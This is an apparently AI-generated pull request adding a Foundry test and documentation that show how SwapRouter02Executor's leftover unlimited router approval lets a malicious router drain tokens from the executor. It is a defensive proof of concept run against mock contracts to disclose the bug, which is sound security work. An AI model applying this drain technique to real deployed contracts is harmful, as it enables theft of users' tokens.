### PR TITLE
Add test for SwapRouter02Executor leftover approvals

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -180,6 +180,11 @@ We tested whether invoking `OrderQuoter.quote` with a fully signed order could t
 - **Test**: `UniversalRouterExecutorAllowanceAttackTest.testFillerCanDrainApprovedTokens` confirms the approval remains after callback.
 - **Result**: **Bug discovered** – allowance to Permit2 persists allowing potential token drain.
 
+## SwapRouter02Executor leftover approvals
+- **Description**: The `SwapRouter02Executor` leaves unlimited allowances to the SwapRouter after `reactorCallback`. A malicious router can steal tokens that accumulate in the executor.
+- **Test**: `SwapRouter02ExecutorAllowanceAttackTest.testFillerCanDrainApprovedTokens` demonstrates a filler draining tokens via the lingering approval.
+- **Result**: **Bug discovered** – lingering approvals enable token theft from the executor.
+
 
 ## Dutch Order With Zero Recipient
 - **Vector:** Execute a `DutchOrder` where an output recipient is the zero address.

--- a/test/executors/SwapRouter02ExecutorAllowanceAttack.t.sol
+++ b/test/executors/SwapRouter02ExecutorAllowanceAttack.t.sol
@@ -1,0 +1,51 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {Test} from "forge-std/Test.sol";
+import {SwapRouter02Executor} from "../../src/sample-executors/SwapRouter02Executor.sol";
+import {MockERC20} from "../util/mock/MockERC20.sol";
+import {MaliciousRouter} from "../util/mock/MaliciousRouter.sol";
+import {IReactor} from "../../src/interfaces/IReactor.sol";
+import {ISwapRouter02} from "../../src/external/ISwapRouter02.sol";
+import {WETH} from "solmate/src/tokens/WETH.sol";
+import {ResolvedOrder} from "../../src/base/ReactorStructs.sol";
+
+contract SwapRouter02ExecutorAllowanceAttackTest is Test {
+    SwapRouter02Executor executor;
+    MockERC20 token;
+    MaliciousRouter router;
+    WETH weth;
+    address filler = address(0xbeef);
+
+    function setUp() public {
+        token = new MockERC20("T", "T", 18);
+        weth = new WETH();
+        router = new MaliciousRouter(address(weth));
+        executor = new SwapRouter02Executor(filler, IReactor(address(this)), address(this), ISwapRouter02(address(router)));
+    }
+
+    function testFillerCanDrainApprovedTokens() public {
+        // Set unlimited approval via callback
+        address[] memory approveSwap = new address[](1);
+        approveSwap[0] = address(token);
+        address[] memory approveReactor = new address[](0);
+        bytes[] memory data = new bytes[](0);
+        vm.prank(address(this));
+        executor.reactorCallback(new ResolvedOrder[](0), abi.encode(approveSwap, approveReactor, data));
+
+        // Approval for router should be max
+        assertEq(token.allowance(address(executor), address(router)), type(uint256).max);
+
+        // Tokens accrue in executor
+        uint256 amount = 1 ether;
+        token.mint(address(executor), amount);
+
+        // Filler drains tokens via router using leftover approval
+        vm.prank(filler);
+        router.drain(address(token), address(executor), filler, amount);
+
+        assertEq(token.balanceOf(address(executor)), 0);
+        assertEq(token.balanceOf(filler), amount);
+    }
+}
+


### PR DESCRIPTION
## Summary
- test SwapRouter02Executor keeps unlimited approval after callback
- document new attack vector in TestedVectors.md

## Testing
- `forge test --match-path test/executors/SwapRouter02ExecutorAllowanceAttack.t.sol --skip test/reactors/LimitOrderReactorExpiredDeadline.t.sol --skip test/lib/OrderQuoter.t.sol -vv`

------
https://chatgpt.com/codex/tasks/task_e_688d115ecd38832da4a6e97c29ac584e